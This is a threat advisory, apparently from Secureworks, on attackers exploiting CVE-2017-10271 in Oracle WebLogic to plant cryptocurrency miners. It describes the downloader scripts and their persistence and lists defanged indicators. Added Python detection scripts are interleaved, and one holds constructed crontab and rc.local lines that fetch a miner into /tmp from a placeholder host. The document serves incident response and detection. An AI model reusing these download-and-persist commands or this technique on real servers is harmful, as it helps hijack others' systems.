
Unpatched Oracle WebLogic Servers Infected with Cryptocurrency Software

By exploiting a known vulnerability on Internet-facing Oracle WebLogic servers, threat actors deployed cryptocurrency miners to Linux and Windows systems.


In December 2017, Secureworks® incident response (IR) analysts responded to multiple incidents where threat actors compromised vulnerable Internet-facing Oracle WebLogic servers on Linux and Windows systems to deploy cryptocurrency software. The unauthorized activity significantly impacted the performance of business-critical and client-facing applications. The continued inquiries about this activity in January 2018 suggest that many organizations have been affected.

Triage of the available data from compromised Linux systems revealed binary files in the /tmp directory consuming processing power and causing performance degradation. When analyzing infected hosts, IR analysts discovered a series of POST requests to /wls-wsat/CoordinatorPortType11 that resulted in an HTTP error code 500 (internal server error). The POST requests attempted to exploit WebLogic vulnerability CVE-2017-10271, which Oracle addressed in October 2017. According to the vulnerability description, this "easily exploitable" issue allows an "unauthenticated attacker with network access via HTTP to compromise [an] Oracle WebLogic Server."
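As an added example (not from the Secureworks post or its IR analysts), the following Python script applies the observation above to WebLogic HTTP access logs: it pulls out POST requests to the /wls-wsat/ endpoint and groups them by source, separating HTTP 500 responses (failed attempts) from other status codes that would warrant closer inspection. The log lines, source addresses and user agents are constructed sample data, and the combined log format is an assumption about how the server is configured to log.

```python
"""Flag WebLogic access-log entries consistent with CVE-2017-10271 exploitation
attempts: POST requests to the WLS-WSAT endpoint, especially those answered with
HTTP 500. Added example; the log lines below are constructed, not taken from the
incidents described in the post."""
import re
from collections import Counter

# Combined-log-format style lines (constructed sample data; addresses are
# RFC 5737 documentation ranges).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Dec/2017:04:12:01 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1337 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Dec/2017:04:12:03 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 500 1337 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Dec/2017:04:13:10 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Dec/2017:04:14:44 +0000] "POST /wls-wsat/CoordinatorPortType11 HTTP/1.1" 200 220 "-" "python-requests/2.18.4"
192.0.2.55 - - [12/Dec/2017:04:15:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.55"
"""

# Minimal parser for the common/combined access-log prefix.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Any request into the WLS-WSAT component is worth reviewing; the path seen in
# the incidents was /wls-wsat/CoordinatorPortType11.
WSAT_PATH_RE = re.compile(r'^/wls-wsat/', re.IGNORECASE)


def parse_line(line):
    """Return a dict with src, ts, method, path and int status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def find_wsat_posts(log_text):
    """Return parsed entries for POST requests to /wls-wsat/*."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and entry["method"] == "POST" and WSAT_PATH_RE.match(entry["path"]):
            hits.append(entry)
    return hits


def summarize_by_source(hits):
    """Count hits per source address, splitting HTTP 500 responses (failed
    attempts) from other status codes, which may indicate success and deserve
    priority in triage."""
    summary = {}
    for hit in hits:
        bucket = summary.setdefault(hit["src"], Counter())
        bucket["error_500" if hit["status"] == 500 else "other"] += 1
    return summary


if __name__ == "__main__":
    for src, counts in summarize_by_source(find_wsat_posts(SAMPLE_LOG)).items():
        print(f"{src}: {counts['error_500']} x HTTP 500, {counts['other']} x other status")
```

A source that produced only 500s may have been probing unsuccessfully; a source that also received a 2xx on the same endpoint is the one to investigate first, together with any new processes and files under /tmp on that host.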

Examination of client environments revealed at least two variations of a Bash script downloaded after successful exploitation. The first variation (see Figure 1) instructs the impacted system to use Wget to download "72 . 11 . 140 . 178/files/l/default" (MD5: faca70429c736dbf0caf2c644622078f) and save it to /tmp/rcp_bh. Once downloaded, rcp_bh is executed to run in the background on the compromised system.

Figure 1. Bash function to download cryptocurrency software. (Source: Secureworks)

The second script variation creates two persistence mechanisms based on the impacted service account name. As shown in Figure 2, the Bash script prints the name of the user account running the script. If the account is root, then root.sh is downloaded to /etc/root.sh and executed. If the user account is anything else, lower.sh is downloaded to the /tmp directory and executed.

Figure 2. Bash script identifying user. (Source: Secureworks)

If root.sh is executed, it downloads and executes "nativesvc" from 207 . 246 . 68 . 21. The script then establishes persistence on the compromised server by creating a cron job and modifying the rc.local file so that the system periodically checks whether the miner is present and downloads a new copy if it is missing. If lower.sh is executed, it downloads and executes a cryptocurrency mining binary file named "river" from 207 . 246 . 125 . 40 but does not create a persistence mechanism.

Windows hosts running vulnerable Oracle WebLogic servers have also been targeted. Observed attacks have downloaded open-source miners such as XMRig.

These incidents are representative of broader campaigns by financially motivated threat actors to deploy cryptocurrency mining software to large numbers of infected hosts. The market valuation of various cryptocurrencies and the ability to outsource resource costs associated with mining make this kind of activity attractive to threat actors. This type of activity will likely continue as long as cryptocurrency mining provides a return on investment for generating funds.

In addition to reviewing and applying the Oracle security update as appropriate, network defenders should implement the following mitigations. These mitigations also protect systems against other types of threats.

  • Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that do not serve a legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
  • Review and apply appropriate security updates for operating systems and applications in a timely manner.
  • Apply the principle of least privilege for system and application credentials, limiting administrator-level access to authorized users and contexts. For Windows systems, consider a solution such as Microsoft’s Local Administrator Password Solution (LAPS) to simplify and strengthen password management.
  • If possible, implement endpoint and network security technologies and centralized logging to detect, restrict, and capture malicious activity. Managing outbound network connections through monitored egress points can help to identify outbound cryptocurrency mining traffic, particularly unencrypted traffic using non-standard ports.
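One way to act on the egress-monitoring advice in the last item, as an added example that is not a Secureworks script or product: triage outbound connection records from a monitored egress point against the network indicators in Table 1 and against an allowlist of expected web ports. The connection records are constructed, the allowlist of ports 80 and 443 is an assumption to be tuned per environment, and the defanged indicators are re-joined only so they can be compared with log data.

```python
"""Triage outbound connection records against the Table 1 network indicators
and an egress port allowlist. Added example, not a Secureworks script; the
connection records are constructed and the allowlist is an assumption."""

STANDARD_PORTS = {80, 443}  # assumed web egress allowlist; tune to the environment

# Network indicators from Table 1, defanged exactly as printed in the post.
TABLE1_DOMAINS = ("pool . minexmr . com", "pool . supportxmr . com")
TABLE1_IPS = ("72 . 11 . 140 . 178", "207 . 246 . 68 . 21",
              "191 . 101 . 180 . 84", "207 . 246 . 125 . 40")


def refang(indicator):
    """Drop the spaces used to defang an indicator so it can match log data."""
    return "".join(indicator.split())


IOC_HOSTS = {refang(x) for x in TABLE1_DOMAINS + TABLE1_IPS}

# Constructed outbound connection records; non-indicator destinations use
# documentation names and RFC 5737 addresses.
SAMPLE_CONNECTIONS = [
    {"src": "10.0.0.21", "dst": "example.com", "dport": 443},
    {"src": "10.0.0.21", "dst": "pool.minexmr.com", "dport": 3333},
    {"src": "10.0.0.33", "dst": "72.11.140.178", "dport": 80},
    {"src": "10.0.0.40", "dst": "203.0.113.9", "dport": 8080},
    {"src": "10.0.0.40", "dst": "example.org", "dport": 80},
]


def classify(conn):
    """Return (severity, reasons) for one record; severity is None if no rule fired.
    An indicator match is high confidence; a non-standard port alone is a
    review item, since the post notes that mining traffic often uses them."""
    reasons = []
    if conn["dst"].lower().rstrip(".") in IOC_HOSTS:
        reasons.append("destination is a Table 1 indicator")
    if conn["dport"] not in STANDARD_PORTS:
        reasons.append("egress to a non-standard port")
    if not reasons:
        return None, reasons
    severity = "high" if reasons[0].startswith("destination") else "review"
    return severity, reasons


def triage(connections):
    """Return [(conn, severity, reasons)] for records that fired at least one rule."""
    findings = []
    for conn in connections:
        severity, reasons = classify(conn)
        if severity:
            findings.append((conn, severity, reasons))
    return findings


if __name__ == "__main__":
    for conn, severity, reasons in triage(SAMPLE_CONNECTIONS):
        print(f"[{severity}] {conn['src']} -> {conn['dst']}:{conn['dport']}  {'; '.join(reasons)}")
```

Because the post warns that IP addresses can be reallocated, treat the address matches as a prompt to pull the host's process list and /tmp contents rather than as proof on their own; the domain matches and the port rule are what keep the check useful after the listed addresses change hands.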

The indicators in Table 1 are associated with this threat. Note that IP addresses can be reallocated. The domains and IP addresses may contain malicious content, so consider the risks before opening them in a browser.

Indicator                                                        | Type        | Context
-----------------------------------------------------------------+-------------+---------------------------------------------------------------
faca70429c736dbf0caf2c644622078f                                 | MD5 hash    | Linux cryptocurrency miner
f79a2ba735a988fa6f65988e1f3d39684727bdc4                         | SHA1 hash   | Linux cryptocurrency miner
bbc6f1e5f02b55fab111202b7ea2b3ef7b53209f6ce53f27d7f16c08f52ef9ac | SHA256 hash | Linux cryptocurrency miner
9d4356274ca394807ae0a6ad82afe2a2                                 | MD5 hash    | Linux cryptocurrency miner
b19ca7fec674543311214c25078ad7a4e1916253                         | SHA1 hash   | Linux cryptocurrency miner
5a788286f82fc78d01dbe2e11776aed1e90b604c12eb826986973e412e0714de | SHA256 hash | Linux cryptocurrency miner
/tmp/rcp_bh                                                      | Filename    | Linux cryptocurrency miner on disk
/tmp/nativesvc                                                   | Filename    | Linux cryptocurrency miner on disk
/tmp/river                                                       | Filename    | Linux cryptocurrency miner on disk
/tmp/watch-smartd                                                | Filename    | Linux cryptocurrency miner on disk
/tmp/Carbon                                                      | Filename    | Linux cryptocurrency miner on disk
pool . minexmr . com                                             | Domain name | Associated with cryptocurrency mining activity
pool . supportxmr . com                                          | Domain name | Hosting cryptocurrency mining software
72 . 11 . 140 . 178                                              | IP address  | Hosting cryptocurrency mining software
207 . 246 . 68 . 21                                              | IP address  | Hosting cryptocurrency mining software
191 . 101 . 180 . 84                                             | IP address  | Hosting downloader scripts for cryptocurrency mining software
207 . 246 . 125 . 40                                             | IP address  | Hosting cryptocurrency mining software

Table 1. Indicators for this threat.
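The following Python script is an added host-triage example (not Secureworks tooling) that ties together the persistence description above and the indicators in Table 1: it hashes the files in a staging directory such as /tmp against the Table 1 hashes, looks for the Table 1 filenames, and scans crontab and rc.local content for lines that reference those names or fetch something into /tmp, which is how the post describes the cron job and rc.local modification re-downloading the miner. The crontab and rc.local text, the sample files and the PLACEHOLDER-HOST.example download host are all constructed; the hash set is extended with the digest of a constructed file only so the hash path can be exercised offline.

```python
"""Host triage for the activity described in this post: match files by hash
and name against Table 1, and flag crontab / rc.local lines that reference the
indicator filenames or fetch into /tmp. Added example, not Secureworks tooling;
the sample crontab and rc.local text below is constructed."""
import hashlib
import os
import re
import shutil
import tempfile

# Indicators from Table 1 of the post (MD5, SHA1 and SHA256 of the two miners).
IOC_HASHES = {
    "faca70429c736dbf0caf2c644622078f",
    "f79a2ba735a988fa6f65988e1f3d39684727bdc4",
    "bbc6f1e5f02b55fab111202b7ea2b3ef7b53209f6ce53f27d7f16c08f52ef9ac",
    "9d4356274ca394807ae0a6ad82afe2a2",
    "b19ca7fec674543311214c25078ad7a4e1916253",
    "5a788286f82fc78d01dbe2e11776aed1e90b604c12eb826986973e412e0714de",
}
IOC_FILENAMES = {"rcp_bh", "nativesvc", "river", "watch-smartd", "Carbon"}
FETCH_TOOLS = {"wget", "curl"}

# Constructed persistence samples modelled on the post's description; the
# download host is a placeholder, not an indicator from the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command   (constructed sample)
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * pgrep -x nativesvc >/dev/null || wget -q -O /tmp/nativesvc http://PLACEHOLDER-HOST.example/nativesvc
"""
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
/usr/sbin/sshd
[ -x /tmp/nativesvc ] || curl -s -o /tmp/nativesvc http://PLACEHOLDER-HOST.example/nativesvc
exit 0
"""


def file_hashes(path):
    """Return the set of MD5, SHA1 and SHA256 hex digests of a file, read in chunks."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return {md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()}


def scan_directory(directory, ioc_hashes=IOC_HASHES, ioc_names=IOC_FILENAMES):
    """Return {path: reasons} for regular files whose name or hash matches an indicator."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        reasons = []
        if name in ioc_names:
            reasons.append("filename matches Table 1")
        if file_hashes(path) & ioc_hashes:
            reasons.append("hash matches Table 1")
        if reasons:
            findings[path] = reasons
    return findings


def scan_persistence(text, source, ioc_names=IOC_FILENAMES):
    """Return (source, line) pairs for non-comment lines that name an indicator
    file or use wget/curl to write into /tmp."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = set(re.split(r"[\s/;&|()]+", stripped))
        names_hit = bool(tokens & ioc_names)
        fetch_to_tmp = bool(tokens & FETCH_TOOLS) and "/tmp/" in stripped
        if names_hit or fetch_to_tmp:
            hits.append((source, stripped))
    return hits


def demo():
    """Run both scans over a constructed staging directory; returns
    ({basename: reasons}, crontab hits, rc.local hits)."""
    workdir = tempfile.mkdtemp()
    try:
        payload = b"constructed sample bytes, not real malware\n"
        for name in ("river", "renamed.bin"):  # same bytes: one IoC name, one innocuous name
            with open(os.path.join(workdir, name), "wb") as f:
                f.write(payload)
        with open(os.path.join(workdir, "notes.txt"), "wb") as f:
            f.write(b"meeting notes\n")
        hashes = IOC_HASHES | {hashlib.sha256(payload).hexdigest()}  # offline exercise of the hash path
        dir_findings = {os.path.basename(p): r for p, r in scan_directory(workdir, hashes).items()}
        return dir_findings, scan_persistence(SAMPLE_CRONTAB, "crontab"), scan_persistence(SAMPLE_RC_LOCAL, "rc.local")
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    files, cron, rc = demo()
    print("files:", files)
    for source, line in cron + rc:
        print(f"{source}: {line}")
```

On a live host the same functions would be pointed at /tmp, the output of `crontab -l` for root and the service account, /etc/crontab and /etc/cron.d, and /etc/rc.local. The hash match catches the exact binaries listed in Table 1, while the filename and persistence checks still fire when the miner has been rebuilt with a different hash.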